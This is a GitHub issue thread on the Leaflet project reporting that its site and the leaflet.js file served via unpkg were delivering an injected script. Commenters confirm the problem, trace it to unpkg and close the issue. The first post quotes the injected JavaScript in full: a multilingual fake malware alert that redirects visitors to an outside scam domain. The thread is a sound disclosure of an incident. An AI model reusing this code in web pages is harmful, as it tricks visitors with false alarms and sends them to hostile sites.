### ISSUE TITLE
Site Script Compromised

### ISSUE THREAD

**Issue by sfeary** [Leaflet/Leaflet#5457]
Not sure where to send this but when opening the Leaflet site a pop-up appears  and redirects you to some random site. 

![screen shot 2017-04-14 at 00 35 18](https://cloud.githubusercontent.com/assets/9056370/25028175/6e624ae0-20aa-11e7-803c-55dcb9ae5559.png)

This is the contents of the script running on line 38 of the main page of http://leafletjs.com/ currently.

``` js
    var lang = navigator.languages ? navigator.languages[0] : (navigator.language || navigator.userLanguage);
    if (lang) lang = lang.substring(0, 2);
    console.log('lang: ' + lang);

    var country = 'IE';

    var msg = 'Your computer is infected. You have to check it with antivirus.';

    if (lang == 'es') msg = "Su navegador contiene malware. Usted tiene que instalar la herramienta de eliminación de malware Chrome.";
    if (lang == 'it') msg = "Il tuo browser contiene malware. È necessario installare strumento di rimozione malware Chrome.";
    if (lang == 'fr') msg = "Votre navigateur contient MALWARE. Vous devez installer l'outil de suppression de logiciels malveillants Chrome.";
    if (lang == 'pt') msg = "Seu navegador contém malware. Você tem que instalar o Ferramenta de remoção Chrome Malware.";
    if (lang == 'de') msg = "Ihr Browser enthält MALWARE. Sie müssen Chrome Malware Removal Tool zu installieren.";
    if (lang == 'ru') msg = "Ваш браузер содержит вредоносный код. Вы должны установить расширение для блокировки вредоносного кода.";
    if (lang == 'gr') msg = "Το πρόγραμμα περιήγησής σας περιέχει κακόβουλο λογισμικό. Θα πρέπει να εγκαταστήσετε το Chrome Malware εργαλείο αφαίρεσης.";

    if (confirm(msg)) {
        window.top.location.href = 'http://compliance-jessica.xyz/tds.php?subid=alertyes' + country + lang;
    } else {
        window.top.location.href = 'http://compliance-jessica.xyz/tds.php?subid=alertno' + country + lang;
```

**Comment by michaelrhanson** [comment]
The attack script is being delivered on requests for the leaflet.js script as well, so this attack is live in the web:

![image](https://cloud.githubusercontent.com/assets/382306/25033333/99be8622-2091-11e7-81f1-47e4420692c7.png)

**Comment by tuupola** [comment]
FWIW I get clean version from unpkg at the moment.

**Comment by michaelrhanson** [comment]
It appears to be intermittent.  Maybe only part of cloudflares cluster is compromised or they haven't refreshed?

**Comment by sfeary** [comment]
Seems to have cleared up now, the script hasn't run once today.

**Comment by frehner** [comment]
Saw this happening as well yesterday; nothing today though. 

Just going to use leaflet through npm now so I don't run into this in the future :)

**Comment by michaelrhanson** [comment]
Issue was at unpkg; resolved and report coming soon.  https://twitter.com/unpkg/status/852669269103869952

**Comment by danzel** [comment]
Closing. Interested to see the full unpkg report when it is available.
